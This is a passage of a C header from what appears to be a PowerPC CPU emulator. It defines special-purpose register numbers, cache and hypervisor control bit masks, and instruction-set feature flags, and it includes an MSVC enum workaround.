(0x11E) #define SPR_BOOKE_PIR (0x11E) #define SPR_PVR (0x11F) #define SPR_HSPRG0 (0x130) #define SPR_BOOKE_DBSR (0x130) #define SPR_HSPRG1 (0x131) #define SPR_HDSISR (0x132) #define SPR_HDAR (0x133) #define SPR_BOOKE_EPCR (0x133) #define SPR_SPURR (0x134) #define SPR_BOOKE_DBCR0 (0x134) #define SPR_IBCR (0x135) #define SPR_PURR (0x135) #define SPR_BOOKE_DBCR1 (0x135) #define SPR_DBCR (0x136) #define SPR_HDEC (0x136) #define SPR_BOOKE_DBCR2 (0x136) #define SPR_HIOR (0x137) #define SPR_MBAR (0x137) #define SPR_RMOR (0x138) #define SPR_BOOKE_IAC1 (0x138) #define SPR_HRMOR (0x139) #define SPR_BOOKE_IAC2 (0x139) #define SPR_HSRR0 (0x13A) #define SPR_BOOKE_IAC3 (0x13A) #define SPR_HSRR1 (0x13B) #define SPR_BOOKE_IAC4 (0x13B) #define SPR_BOOKE_DAC1 (0x13C) #define SPR_MMCRH (0x13C) #define SPR_DABR2 (0x13D) #define SPR_BOOKE_DAC2 (0x13D) #define SPR_TFMR (0x13D) #define SPR_BOOKE_DVC1 (0x13E) #define SPR_LPCR (0x13E) #define SPR_BOOKE_DVC2 (0x13F) #define SPR_LPIDR (0x13F) #define SPR_BOOKE_TSR (0x150) #define SPR_HMER (0x150) #define SPR_HMEER (0x151) #define SPR_PCR (0x152) #define SPR_BOOKE_LPIDR (0x152) #define SPR_BOOKE_TCR (0x154) #define SPR_BOOKE_TLB0PS (0x158) #define SPR_BOOKE_TLB1PS (0x159) #define SPR_BOOKE_TLB2PS (0x15A) #define SPR_BOOKE_TLB3PS (0x15B) #define SPR_AMOR (0x15D) #define SPR_BOOKE_MAS7_MAS3 (0x174) #define SPR_BOOKE_IVOR0 (0x190) #define SPR_BOOKE_IVOR1 (0x191) #define SPR_BOOKE_IVOR2 (0x192) #define SPR_BOOKE_IVOR3 (0x193) #define SPR_BOOKE_IVOR4 (0x194) #define SPR_BOOKE_IVOR5 (0x195) #define SPR_BOOKE_IVOR6 (0x196) #define SPR_BOOKE_IVOR7 (0x197) #define SPR_BOOKE_IVOR8 (0x198) #define SPR_BOOKE_IVOR9 (0x199) #define SPR_BOOKE_IVOR10 (0x19A) #define SPR_BOOKE_IVOR11 (0x19B) #define SPR_BOOKE_IVOR12 (0x19C) #define SPR_BOOKE_IVOR13 (0x19D) #define SPR_BOOKE_IVOR14 (0x19E) #define SPR_BOOKE_IVOR15 (0x19F) #define SPR_BOOKE_IVOR38 (0x1B0) #define SPR_BOOKE_IVOR39 (0x1B1) #define SPR_BOOKE_IVOR40 (0x1B2) #define SPR_BOOKE_IVOR41 (0x1B3) #define SPR_BOOKE_IVOR42 (0x1B4) #define SPR_BOOKE_GIVOR2 (0x1B8) #define SPR_BOOKE_GIVOR3 (0x1B9) #define SPR_BOOKE_GIVOR4 (0x1BA) #define SPR_BOOKE_GIVOR8 (0x1BB) #define SPR_BOOKE_GIVOR13 (0x1BC) #define SPR_BOOKE_GIVOR14 (0x1BD) #define SPR_TIR (0x1BE) #define SPR_PTCR (0x1D0) #define SPR_BOOKE_SPEFSCR (0x200) #define SPR_Exxx_BBEAR (0x201) #define SPR_Exxx_BBTAR (0x202) #define SPR_Exxx_L1CFG0 (0x203) #define SPR_Exxx_L1CFG1 (0x204) #define SPR_Exxx_NPIDR (0x205) #define SPR_ATBL (0x20E) #define SPR_ATBU (0x20F) #define SPR_IBAT0U (0x210) #define SPR_BOOKE_IVOR32 (0x210) #define SPR_RCPU_MI_GRA (0x210) #define SPR_IBAT0L (0x211) #define SPR_BOOKE_IVOR33 (0x211) #define SPR_IBAT1U (0x212) #define SPR_BOOKE_IVOR34 (0x212) #define SPR_IBAT1L (0x213) #define SPR_BOOKE_IVOR35 (0x213) #define SPR_IBAT2U (0x214) #define SPR_BOOKE_IVOR36 (0x214) #define SPR_IBAT2L (0x215) #define SPR_BOOKE_IVOR37 (0x215) #define SPR_IBAT3U (0x216) #define SPR_IBAT3L (0x217) #define SPR_DBAT0U (0x218) #define SPR_RCPU_L2U_GRA (0x218) #define SPR_DBAT0L (0x219) #define SPR_DBAT1U (0x21A) #define SPR_DBAT1L (0x21B) #define SPR_DBAT2U (0x21C) #define SPR_DBAT2L (0x21D) #define SPR_DBAT3U (0x21E) #define SPR_DBAT3L (0x21F) #define SPR_IBAT4U (0x230) #define SPR_RPCU_BBCMCR (0x230) #define SPR_MPC_IC_CST (0x230) #define SPR_Exxx_CTXCR (0x230) #define SPR_IBAT4L (0x231) #define SPR_MPC_IC_ADR (0x231) #define SPR_Exxx_DBCR3 (0x231) #define SPR_IBAT5U (0x232) #define SPR_MPC_IC_DAT (0x232) #define SPR_Exxx_DBCNT (0x232) #define SPR_IBAT5L (0x233) #define SPR_IBAT6U (0x234) #define SPR_IBAT6L (0x235) #define SPR_IBAT7U (0x236) #define SPR_IBAT7L (0x237) #define SPR_DBAT4U (0x238) #define SPR_RCPU_L2U_MCR (0x238) #define SPR_MPC_DC_CST (0x238) #define SPR_Exxx_ALTCTXCR (0x238) #define SPR_DBAT4L (0x239) #define SPR_MPC_DC_ADR (0x239) #define SPR_DBAT5U (0x23A) #define SPR_BOOKE_MCSRR0 (0x23A) #define SPR_MPC_DC_DAT (0x23A) #define SPR_DBAT5L (0x23B) #define SPR_BOOKE_MCSRR1 (0x23B) #define SPR_DBAT6U (0x23C) #define SPR_BOOKE_MCSR (0x23C) #define SPR_DBAT6L (0x23D) #define SPR_Exxx_MCAR (0x23D) #define SPR_DBAT7U (0x23E) #define SPR_BOOKE_DSRR0 (0x23E) #define SPR_DBAT7L (0x23F) #define SPR_BOOKE_DSRR1 (0x23F) #define SPR_BOOKE_SPRG8 (0x25C) #define SPR_BOOKE_SPRG9 (0x25D) #define SPR_BOOKE_MAS0 (0x270) #define SPR_BOOKE_MAS1 (0x271) #define SPR_BOOKE_MAS2 (0x272) #define SPR_BOOKE_MAS3 (0x273) #define SPR_BOOKE_MAS4 (0x274) #define SPR_BOOKE_MAS5 (0x275) #define SPR_BOOKE_MAS6 (0x276) #define SPR_BOOKE_PID1 (0x279) #define SPR_BOOKE_PID2 (0x27A) #define SPR_MPC_DPDR (0x280) #define SPR_MPC_IMMR (0x288) #define SPR_BOOKE_TLB0CFG (0x2B0) #define SPR_BOOKE_TLB1CFG (0x2B1) #define SPR_BOOKE_TLB2CFG (0x2B2) #define SPR_BOOKE_TLB3CFG (0x2B3) #define SPR_BOOKE_EPR (0x2BE) #define SPR_PERF0 (0x300) #define SPR_RCPU_MI_RBA0 (0x300) #define SPR_MPC_MI_CTR (0x300) #define SPR_POWER_USIER (0x300) #define SPR_PERF1 (0x301) #define SPR_RCPU_MI_RBA1 (0x301) #define SPR_POWER_UMMCR2 (0x301) #define SPR_PERF2 (0x302) #define SPR_RCPU_MI_RBA2 (0x302) #define SPR_MPC_MI_AP (0x302) #define SPR_POWER_UMMCRA (0x302) #define SPR_PERF3 (0x303) #define SPR_RCPU_MI_RBA3 (0x303) #define SPR_MPC_MI_EPN (0x303) #define SPR_POWER_UPMC1 (0x303) #define SPR_PERF4 (0x304) #define SPR_POWER_UPMC2 (0x304) #define SPR_PERF5 (0x305) #define SPR_MPC_MI_TWC (0x305) #define SPR_POWER_UPMC3 (0x305) #define SPR_PERF6 (0x306) #define SPR_MPC_MI_RPN (0x306) #define SPR_POWER_UPMC4 (0x306) #define SPR_PERF7 (0x307) #define SPR_POWER_UPMC5 (0x307) #define SPR_PERF8 (0x308) #define SPR_RCPU_L2U_RBA0 (0x308) #define SPR_MPC_MD_CTR (0x308) #define SPR_POWER_UPMC6 (0x308) #define SPR_PERF9 (0x309) #define SPR_RCPU_L2U_RBA1 (0x309) #define SPR_MPC_MD_CASID (0x309) #define SPR_970_UPMC7 (0X309) #define SPR_PERFA (0x30A) #define SPR_RCPU_L2U_RBA2 (0x30A) #define SPR_MPC_MD_AP (0x30A) #define SPR_970_UPMC8 (0X30A) #define SPR_PERFB (0x30B) #define SPR_RCPU_L2U_RBA3 (0x30B) #define SPR_MPC_MD_EPN (0x30B) #define SPR_POWER_UMMCR0 (0X30B) #define SPR_PERFC (0x30C) #define SPR_MPC_MD_TWB (0x30C) #define SPR_POWER_USIAR (0X30C) #define SPR_PERFD (0x30D) #define SPR_MPC_MD_TWC (0x30D) #define SPR_POWER_USDAR (0X30D) #define SPR_PERFE (0x30E) #define SPR_MPC_MD_RPN (0x30E) #define SPR_POWER_UMMCR1 (0X30E) #define SPR_PERFF (0x30F) #define SPR_MPC_MD_TW (0x30F) #define SPR_UPERF0 (0x310) #define SPR_POWER_SIER (0x310) #define SPR_UPERF1 (0x311) #define SPR_POWER_MMCR2 (0x311) #define SPR_UPERF2 (0x312) #define SPR_POWER_MMCRA (0X312) #define SPR_UPERF3 (0x313) #define SPR_POWER_PMC1 (0X313) #define SPR_UPERF4 (0x314) #define SPR_POWER_PMC2 (0X314) #define SPR_UPERF5 (0x315) #define SPR_POWER_PMC3 (0X315) #define SPR_UPERF6 (0x316) #define SPR_POWER_PMC4 (0X316) #define SPR_UPERF7 (0x317) #define SPR_POWER_PMC5 (0X317) #define SPR_UPERF8 (0x318) #define SPR_POWER_PMC6 (0X318) #define SPR_UPERF9 (0x319) #define SPR_970_PMC7 (0X319) #define SPR_UPERFA (0x31A) #define SPR_970_PMC8 (0X31A) #define SPR_UPERFB (0x31B) #define SPR_POWER_MMCR0 (0X31B) #define SPR_UPERFC (0x31C) #define SPR_POWER_SIAR (0X31C) #define SPR_UPERFD (0x31D) #define SPR_POWER_SDAR (0X31D) #define SPR_UPERFE (0x31E) #define SPR_POWER_MMCR1 (0X31E) #define SPR_UPERFF (0x31F) #define SPR_RCPU_MI_RA0 (0x320) #define SPR_MPC_MI_DBCAM (0x320) #define SPR_BESCRS (0x320) #define SPR_RCPU_MI_RA1 (0x321) #define SPR_MPC_MI_DBRAM0 (0x321) #define SPR_BESCRSU (0x321) #define SPR_RCPU_MI_RA2 (0x322) #define SPR_MPC_MI_DBRAM1 (0x322) #define SPR_BESCRR (0x322) #define SPR_RCPU_MI_RA3 (0x323) #define SPR_BESCRRU (0x323) #define SPR_EBBHR (0x324) #define SPR_EBBRR (0x325) #define SPR_BESCR (0x326) #define SPR_RCPU_L2U_RA0 (0x328) #define SPR_MPC_MD_DBCAM (0x328) #define SPR_RCPU_L2U_RA1 (0x329) #define SPR_MPC_MD_DBRAM0 (0x329) #define SPR_RCPU_L2U_RA2 (0x32A) #define SPR_MPC_MD_DBRAM1 (0x32A) #define SPR_RCPU_L2U_RA3 (0x32B) #define SPR_TAR (0x32F) #define SPR_ASDR (0x330) #define SPR_IC (0x350) #define SPR_VTB (0x351) #define SPR_MMCRC (0x353) #define SPR_PSSCR (0x357) #define SPR_440_INV0 (0x370) #define SPR_440_INV1 (0x371) #define SPR_440_INV2 (0x372) #define SPR_440_INV3 (0x373) #define SPR_440_ITV0 (0x374) #define SPR_440_ITV1 (0x375) #define SPR_440_ITV2 (0x376) #define SPR_440_ITV3 (0x377) #define SPR_440_CCR1 (0x378) #define SPR_TACR (0x378) #define SPR_TCSCR (0x379) #define SPR_CSIGR (0x37a) #define SPR_DCRIPR (0x37B) #define SPR_POWER_SPMC1 (0x37C) #define SPR_POWER_SPMC2 (0x37D) #define SPR_POWER_MMCRS (0x37E) #define SPR_WORT (0x37F) #define SPR_PPR (0x380) #define SPR_750_GQR0 (0x390) #define SPR_440_DNV0 (0x390) #define SPR_750_GQR1 (0x391) #define SPR_440_DNV1 (0x391) #define SPR_750_GQR2 (0x392) #define SPR_440_DNV2 (0x392) #define SPR_750_GQR3 (0x393) #define SPR_440_DNV3 (0x393) #define SPR_750_GQR4 (0x394) #define SPR_440_DTV0 (0x394) #define SPR_750_GQR5 (0x395) #define SPR_440_DTV1 (0x395) #define SPR_750_GQR6 (0x396) #define SPR_440_DTV2 (0x396) #define SPR_750_GQR7 (0x397) #define SPR_440_DTV3 (0x397) #define SPR_750_THRM4 (0x398) #define SPR_750CL_HID2 (0x398) #define SPR_440_DVLIM (0x398) #define SPR_750_WPAR (0x399) #define SPR_440_IVLIM (0x399) #define SPR_TSCR (0x399) #define SPR_750_DMAU (0x39A) #define SPR_750_DMAL (0x39B) #define SPR_440_RSTCFG (0x39B) #define SPR_BOOKE_DCDBTRL (0x39C) #define SPR_BOOKE_DCDBTRH (0x39D) #define SPR_BOOKE_ICDBTRL (0x39E) #define SPR_BOOKE_ICDBTRH (0x39F) #define SPR_74XX_UMMCR2 (0x3A0) #define SPR_7XX_UPMC5 (0x3A1) #define SPR_7XX_UPMC6 (0x3A2) #define SPR_UBAMR (0x3A7) #define SPR_7XX_UMMCR0 (0x3A8) #define SPR_7XX_UPMC1 (0x3A9) #define SPR_7XX_UPMC2 (0x3AA) #define SPR_7XX_USIAR (0x3AB) #define SPR_7XX_UMMCR1 (0x3AC) #define SPR_7XX_UPMC3 (0x3AD) #define SPR_7XX_UPMC4 (0x3AE) #define SPR_USDA (0x3AF) #define SPR_40x_ZPR (0x3B0) #define SPR_BOOKE_MAS7 (0x3B0) #define SPR_74XX_MMCR2 (0x3B0) #define SPR_7XX_PMC5 (0x3B1) #define SPR_40x_PID (0x3B1) #define SPR_7XX_PMC6 (0x3B2) #define SPR_440_MMUCR (0x3B2) #define SPR_4xx_CCR0 (0x3B3) #define SPR_BOOKE_EPLC (0x3B3) #define SPR_405_IAC3 (0x3B4) #define SPR_BOOKE_EPSC (0x3B4) #define SPR_405_IAC4 (0x3B5) #define SPR_405_DVC1 (0x3B6) #define SPR_405_DVC2 (0x3B7) #define SPR_BAMR (0x3B7) #define SPR_7XX_MMCR0 (0x3B8) #define SPR_7XX_PMC1 (0x3B9) #define SPR_40x_SGR (0x3B9) #define SPR_7XX_PMC2 (0x3BA) #define SPR_40x_DCWR (0x3BA) #define SPR_7XX_SIAR (0x3BB) #define SPR_405_SLER (0x3BB) #define SPR_7XX_MMCR1 (0x3BC) #define SPR_405_SU0R (0x3BC) #define SPR_401_SKR (0x3BC) #define SPR_7XX_PMC3 (0x3BD) #define SPR_405_DBCR1 (0x3BD) #define SPR_7XX_PMC4 (0x3BE) #define SPR_SDA (0x3BF) #define SPR_403_VTBL (0x3CC) #define SPR_403_VTBU (0x3CD) #define SPR_DMISS (0x3D0) #define SPR_DCMP (0x3D1) #define SPR_HASH1 (0x3D2) #define SPR_HASH2 (0x3D3) #define SPR_BOOKE_ICDBDR (0x3D3) #define SPR_TLBMISS (0x3D4) #define SPR_IMISS (0x3D4) #define SPR_40x_ESR (0x3D4) #define SPR_PTEHI (0x3D5) #define SPR_ICMP (0x3D5) #define SPR_40x_DEAR (0x3D5) #define SPR_PTELO (0x3D6) #define SPR_RPA (0x3D6) #define SPR_40x_EVPR (0x3D6) #define SPR_L3PM (0x3D7) #define SPR_403_CDBCR (0x3D7) #define SPR_L3ITCR0 (0x3D8) #define SPR_TCR (0x3D8) #define SPR_40x_TSR (0x3D8) #define SPR_IBR (0x3DA) #define SPR_40x_TCR (0x3DA) #define SPR_ESASRR (0x3DB) #define SPR_40x_PIT (0x3DB) #define SPR_403_TBL (0x3DC) #define SPR_403_TBU (0x3DD) #define SPR_SEBR (0x3DE) #define SPR_40x_SRR2 (0x3DE) #define SPR_SER (0x3DF) #define SPR_40x_SRR3 (0x3DF) #define SPR_L3OHCR (0x3E8) #define SPR_L3ITCR1 (0x3E9) #define SPR_L3ITCR2 (0x3EA) #define SPR_L3ITCR3 (0x3EB) #define SPR_HID0 (0x3F0) #define SPR_40x_DBSR (0x3F0) #define SPR_HID1 (0x3F1) #define SPR_IABR (0x3F2) #define SPR_40x_DBCR0 (0x3F2) #define SPR_601_HID2 (0x3F2) #define SPR_Exxx_L1CSR0 (0x3F2) #define SPR_ICTRL (0x3F3) #define SPR_HID2 (0x3F3) #define SPR_750CL_HID4 (0x3F3) #define SPR_Exxx_L1CSR1 (0x3F3) #define SPR_440_DBDR (0x3F3) #define SPR_LDSTDB (0x3F4) #define SPR_750_TDCL (0x3F4) #define SPR_40x_IAC1 (0x3F4) #define SPR_MMUCSR0 (0x3F4) #define SPR_970_HID4 (0x3F4) #define SPR_DABR (0x3F5) #define DABR_MASK (~(target_ulong)0x7) #define SPR_Exxx_BUCSR (0x3F5) #define SPR_40x_IAC2 (0x3F5) #define SPR_601_HID5 (0x3F5) #define SPR_40x_DAC1 (0x3F6) #define SPR_MSSCR0 (0x3F6) #define SPR_970_HID5 (0x3F6) #define SPR_MSSSR0 (0x3F7) #define SPR_MSSCR1 (0x3F7) #define SPR_DABRX (0x3F7) #define SPR_40x_DAC2 (0x3F7) #define SPR_MMUCFG (0x3F7) #define SPR_LDSTCR (0x3F8) #define SPR_L2PMCR (0x3F8) #define SPR_750FX_HID2 (0x3F8) #define SPR_Exxx_L1FINV0 (0x3F8) #define SPR_L2CR (0x3F9) #define SPR_L3CR (0x3FA) #define SPR_750_TDCH (0x3FA) #define SPR_IABR2 (0x3FA) #define SPR_40x_DCCR (0x3FA) #define SPR_ICTC (0x3FB) #define SPR_40x_ICCR (0x3FB) #define SPR_THRM1 (0x3FC) #define SPR_403_PBL1 (0x3FC) #define SPR_SP (0x3FD) #define SPR_THRM2 (0x3FD) #define SPR_403_PBU1 (0x3FD) #define SPR_604_HID13 (0x3FD) #define SPR_LT (0x3FE) #define SPR_THRM3 (0x3FE) #define SPR_RCPU_FPECR (0x3FE) #define SPR_403_PBL2 (0x3FE) #define SPR_PIR (0x3FF) #define SPR_403_PBU2 (0x3FF) #define SPR_601_HID15 (0x3FF) #define SPR_604_HID15 (0x3FF) #define SPR_E500_SVR (0x3FF) /* Disable MAS Interrupt Updates for Hypervisor */ #define EPCR_DMIUH (1 << 22) /* Disable Guest TLB Management Instructions */ #define EPCR_DGTMI (1 << 23) /* Guest Interrupt Computation Mode */ #define EPCR_GICM (1 << 24) /* Interrupt Computation Mode */ #define EPCR_ICM (1 << 25) /* Disable Embedded Hypervisor Debug */ #define EPCR_DUVD (1 << 26) /* Instruction Storage Interrupt Directed to Guest State */ #define EPCR_ISIGS (1 << 27) /* Data Storage Interrupt Directed to Guest State */ #define EPCR_DSIGS (1 << 28) /* Instruction TLB Error Interrupt Directed to Guest State */ #define EPCR_ITLBGS (1 << 29) /* Data TLB Error Interrupt Directed to Guest State */ #define EPCR_DTLBGS (1 << 30) /* External Input Interrupt Directed to Guest State */ #define EPCR_EXTGS (1 << 31) #define L1CSR0_CPE 0x00010000 /* Data Cache Parity Enable */ #define L1CSR0_CUL 0x00000400 /* (D-)Cache Unable to Lock */ #define L1CSR0_DCLFR 0x00000100 /* D-Cache Lock Flash Reset */ #define L1CSR0_DCFI 0x00000002 /* Data Cache Flash Invalidate */ #define L1CSR0_DCE 0x00000001 /* Data Cache Enable */ #define L1CSR1_CPE 0x00010000 /* Instruction Cache Parity Enable */ #define L1CSR1_ICUL 0x00000400 /* I-Cache Unable to Lock */ #define L1CSR1_ICLFR 0x00000100 /* I-Cache Lock Flash Reset */ #define L1CSR1_ICFI 0x00000002 /* Instruction Cache Flash Invalidate */ #define L1CSR1_ICE 0x00000001 /* Instruction Cache Enable */ /* HID0 bits */ #define HID0_DEEPNAP (1 << 24) /* pre-2.06 */ #define HID0_DOZE (1 << 23) /* pre-2.06 */ #define HID0_NAP (1 << 22) /* pre-2.06 */ #define HID0_HILE PPC_BIT(19) /* POWER8 */ #define HID0_POWER9_HILE PPC_BIT(4) /*****************************************************************************/ /* PowerPC Instructions types definitions */ enum { PPC_NONE = 0x0000000000000000ULL, /* PowerPC base instructions set */ PPC_INSNS_BASE = 0x0000000000000001ULL, /* integer operations instructions */ #define PPC_INTEGER PPC_INSNS_BASE /* flow control instructions */ #define PPC_FLOW PPC_INSNS_BASE /* virtual memory instructions */ #define PPC_MEM PPC_INSNS_BASE /* ld/st with reservation instructions */ #define PPC_RES PPC_INSNS_BASE /* spr/msr access instructions */ #define PPC_MISC PPC_INSNS_BASE /* Deprecated instruction sets */ /* Original POWER instruction set */ PPC_POWER = 0x0000000000000002ULL, /* POWER2 instruction set extension */ PPC_POWER2 = 0x0000000000000004ULL, /* Power RTC support */ PPC_POWER_RTC = 0x0000000000000008ULL, /* Power-to-PowerPC bridge (601) */ PPC_POWER_BR = 0x0000000000000010ULL, /* 64 bits PowerPC instruction set */ PPC_64B = 0x0000000000000020ULL, /* New 64 bits extensions (PowerPC 2.0x) */ PPC_64BX = 0x0000000000000040ULL, /* 64 bits hypervisor extensions */ PPC_64H = 0x0000000000000080ULL, /* New wait instruction (PowerPC 2.0x) */ PPC_WAIT = 0x0000000000000100ULL, /* Time base mftb instruction */ PPC_MFTB = 0x0000000000000200ULL, /* Fixed-point unit extensions */ /* PowerPC 602 specific */ PPC_602_SPEC = 0x0000000000000400ULL, /* isel instruction */ PPC_ISEL = 0x0000000000000800ULL, /* popcntb instruction */ PPC_POPCNTB = 0x0000000000001000ULL, /* string load / store */ PPC_STRING = 0x0000000000002000ULL, /* real mode cache inhibited load / store */ PPC_CILDST = 0x0000000000004000ULL, /* Floating-point unit extensions */ /* Optional floating point instructions */ PPC_FLOAT = 0x0000000000010000ULL, /* New floating-point extensions (PowerPC 2.0x) */ PPC_FLOAT_EXT = 0x0000000000020000ULL, PPC_FLOAT_FSQRT = 0x0000000000040000ULL, PPC_FLOAT_FRES = 0x0000000000080000ULL, PPC_FLOAT_FRSQRTE = 0x0000000000100000ULL, PPC_FLOAT_FRSQRTES = 0x0000000000200000ULL, PPC_FLOAT_FSEL = 0x0000000000400000ULL, PPC_FLOAT_STFIWX = 0x0000000000800000ULL, /* Vector/SIMD extensions */ /* Altivec support */ PPC_ALTIVEC = 0x0000000001000000ULL, /* PowerPC 2.03 SPE extension */ PPC_SPE = 0x0000000002000000ULL, /* PowerPC 2.03 SPE single-precision floating-point extension */ PPC_SPE_SINGLE = 0x0000000004000000ULL, /* PowerPC 2.03 SPE double-precision floating-point extension */ PPC_SPE_DOUBLE = 0x0000000008000000ULL, /* Optional memory control instructions */ PPC_MEM_TLBIA = 0x0000000010000000ULL, PPC_MEM_TLBIE = 0x0000000020000000ULL, PPC_MEM_TLBSYNC = 0x0000000040000000ULL, // The enum in msvc is 32bit **signed**. // https://godbolt.org/z/nYbvWPWET #ifndef _MSC_VER /* sync instruction */ PPC_MEM_SYNC = 0x0000000080000000ULL, /* eieio instruction */ PPC_MEM_EIEIO = 0x0000000100000000ULL, /* Cache control instructions */ PPC_CACHE = 0x0000000200000000ULL, /* icbi instruction */ PPC_CACHE_ICBI = 0x0000000400000000ULL, /* dcbz instruction */ PPC_CACHE_DCBZ = 0x0000000800000000ULL, /* dcba instruction */ PPC_CACHE_DCBA = 0x0000002000000000ULL, /* Freescale cache locking instructions */ PPC_CACHE_LOCK = 0x0000004000000000ULL, /* MMU related extensions */ /* external control instructions */ PPC_EXTERN = 0x0000010000000000ULL, /* segment register access instructions */ PPC_SEGMENT = 0x0000020000000000ULL, /* PowerPC 6xx TLB management instructions */ PPC_6xx_TLB = 0x0000040000000000ULL, /* PowerPC 74xx TLB management instructions */ PPC_74xx_TLB = 0x0000080000000000ULL, /* PowerPC 40x TLB management instructions */ PPC_40x_TLB = 0x0000100000000000ULL, /* segment register access instructions for PowerPC 64 "bridge" */ PPC_SEGMENT_64B = 0x0000200000000000ULL, /* SLB management */ PPC_SLBI = 0x0000400000000000ULL, /* Embedded PowerPC dedicated instructions */ PPC_WRTEE = 0x0001000000000000ULL, /* PowerPC 40x exception model */ PPC_40x_EXCP = 0x0002000000000000ULL, /* PowerPC 405 Mac instructions */ PPC_405_MAC = 0x0004000000000000ULL, /* PowerPC 440 specific instructions */ PPC_440_SPEC = 0x0008000000000000ULL, /* BookE (embedded) PowerPC specification */ PPC_BOOKE = 0x0010000000000000ULL, /* mfapidi instruction */ PPC_MFAPIDI = 0x0020000000000000ULL, /* tlbiva instruction */ PPC_TLBIVA = 0x0040000000000000ULL, /* tlbivax instruction */ PPC_TLBIVAX = 0x0080000000000000ULL, /* PowerPC 4xx dedicated instructions */ PPC_4xx_COMMON = 0x0100000000000000ULL, /* PowerPC 40x ibct instructions */ PPC_40x_ICBT = 0x0200000000000000ULL, /* rfmci is not implemented in all BookE PowerPC */ PPC_RFMCI = 0x0400000000000000ULL, /* rfdi instruction */ PPC_RFDI = 0x0800000000000000ULL, /* DCR accesses */ PPC_DCR = 0x1000000000000000ULL, /* DCR extended accesse */ PPC_DCRX = 0x2000000000000000ULL, /* user-mode DCR access, implemented in PowerPC 460 */ PPC_DCRUX = 0x4000000000000000ULL, /* popcntw and popcntd instructions */ PPC_POPCNTWD = 0x8000000000000000ULL, #else #define PPC_MEM_SYNC 0x0000000080000000ULL #define PPC_MEM_EIEIO 0x0000000100000000ULL #define PPC_CACHE 0x0000000200000000ULL #define PPC_CACHE_ICBI 0x0000000400000000ULL #define PPC_CACHE_DCBZ 0x0000000800000000ULL #define PPC_CACHE_DCBA 0x0000002000000000ULL #define PPC_CACHE_LOCK 0x0000004000000000ULL #define PPC_EXTERN 0x0000010000000000ULL #define PPC_SEGMENT 0x0000020000000000ULL #define PPC_6xx_TLB 0x0000040000000000ULL #define PPC_74xx_TLB 0x0000080000000000ULL #define PPC_40x_TLB 0x0000100000000000ULL #define PPC_SEGMENT_64B 0x0000200000000000ULL #define PPC_SLBI 0x0000400000000000ULL #define PPC_WRTEE 0x0001000000000000ULL #define PPC_40x_EXCP 0x0002000000000000ULL #define PPC_405_MAC 0x0004000000000000ULL #define PPC_440_SPEC 0x0008000000000000ULL #define PPC_BOOKE 0x0010000000000000ULL #define PPC_MFAPIDI 0x0020000000000000ULL #define PPC_TLBIVA 0x0040000000000000ULL #define PPC_TLBIVAX 0x0080000000000000ULL #define PPC_4xx_COMMON 0x0100000000000000ULL #define PPC_40x_ICBT 0x0200000000000000ULL #define PPC_RFMCI 0x0400000000000000ULL #define PPC_RFDI 0x0800000000000000ULL #define PPC_DCR 0x1000000000000000ULL #define PPC_DCRX 0x2000000000000000ULL #define PPC_DCRUX 0x4000000000000000ULL #define PPC_POPCNTWD 0x8000000000000000ULL #endif #define PPC_TCG_INSNS (PPC_INSNS_BASE | PPC_POWER | PPC_POWER2 \ | PPC_POWER_RTC | PPC_POWER_BR | PPC_64B \ | PPC_64BX | PPC_64H | PPC_WAIT | PPC_MFTB \ | PPC_602_SPEC | PPC_ISEL | PPC_POPCNTB \ | PPC_STRING | PPC_FLOAT | PPC_FLOAT_EXT \ | PPC_FLOAT_FSQRT | PPC_FLOAT_FRES \ | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES \ | PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX \ | PPC_ALTIVEC | PPC_SPE | PPC_SPE_SINGLE \ | PPC_SPE_DOUBLE | PPC_MEM_TLBIA \ | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC \ | PPC_MEM_SYNC | PPC_MEM_EIEIO \ | PPC_CACHE | PPC_CACHE_ICBI \ | PPC_CACHE_DCBZ \ | PPC_CACHE_DCBA | PPC_CACHE_LOCK \ | PPC_EXTERN | PPC_SEGMENT | PPC_6xx_TLB \ | PPC_74xx_TLB | PPC_40x_TLB | PPC_SEGMENT_64B \ | PPC_SLBI | PPC_WRTEE | PPC_40x_EXCP \ | PPC_405_MAC | PPC_440_SPEC | PPC_BOOKE \ | PPC_MFAPIDI | PPC_TLBIVA | PPC_TLBIVAX \ | PPC_4xx_COMMON | PPC_40x_ICBT | PPC_RFMCI \ | PPC_RFDI | PPC_DCR | PPC_DCRX | PPC_DCRUX \ | PPC_POPCNTWD | PPC_CILDST) /* extended type values */ /* BookE 2.06 PowerPC specification */ PPC2_BOOKE206 = 0x0000000000000001ULL, /* VSX (extensions to Altivec / VMX) */ PPC2_VSX = 0x0000000000000002ULL, /* Decimal Floating Point (DFP) */ PPC2_DFP = 0x0000000000000004ULL, /* Embedded.Processor Control */ PPC2_PRCNTL = 0x0000000000000008ULL, /* Byte-reversed, indexed, double-word load and store */ PPC2_DBRX = 0x0000000000000010ULL, /* Book I 2.05 PowerPC specification */ PPC2_ISA205 = 0x0000000000000020ULL, /* VSX additions in ISA 2.07 */ PPC2_VSX207 = 0x0000000000000040ULL, /* ISA 2.06B bpermd */ PPC2_PERM_ISA206 = 0x0000000000000080ULL, /* ISA 2.06B divide extended variants */ PPC2_DIVE_ISA206 = 0x0000000000000100ULL, /* ISA 2.06B larx/stcx. instructions */ PPC2_ATOMIC_ISA206 = 0x0000000000000200ULL, /* ISA 2.06B floating point integer conversion */ PPC2_FP_CVT_ISA206 = 0x0000000000000400ULL, /* ISA 2.06B floating point test instructions */ PPC2_FP_TST_ISA206 = 0x0000000000000800ULL, /* ISA 2.07 bctar instruction */ PPC2_BCTAR_ISA207 = 0x0000000000001000ULL, /* ISA 2.07 load/store quadword */ PPC2_LSQ_ISA207 = 0x0000000000002000ULL, /* ISA 2.07 Altivec */ PPC2_ALTIVEC_207 = 0x0000000000004000ULL, /* PowerISA 2.07 Book3s specification */ PPC2_ISA207S = 0x0000000000008000ULL, /* Double precision floating point conversion for signed integer 64 */ PPC2_FP_CVT_S64 = 0x0000000000010000ULL, /* Transactional Memory (ISA 2.07, Book II) */ PPC2_TM = 0x0000000000020000ULL, /* Server PM instructgions (ISA 2.06, Book III) */ PPC2_PM_ISA206 = 0x0000000000040000ULL, /* POWER ISA 3.0 */ PPC2_ISA300 = 0x0000000000080000ULL, #define PPC_TCG_INSNS2 (PPC2_BOOKE206 | PPC2_VSX | PPC2_PRCNTL | PPC2_DBRX | \ PPC2_ISA205 | PPC2_VSX207 | PPC2_PERM_ISA206 | \ PPC2_DIVE_ISA206 | 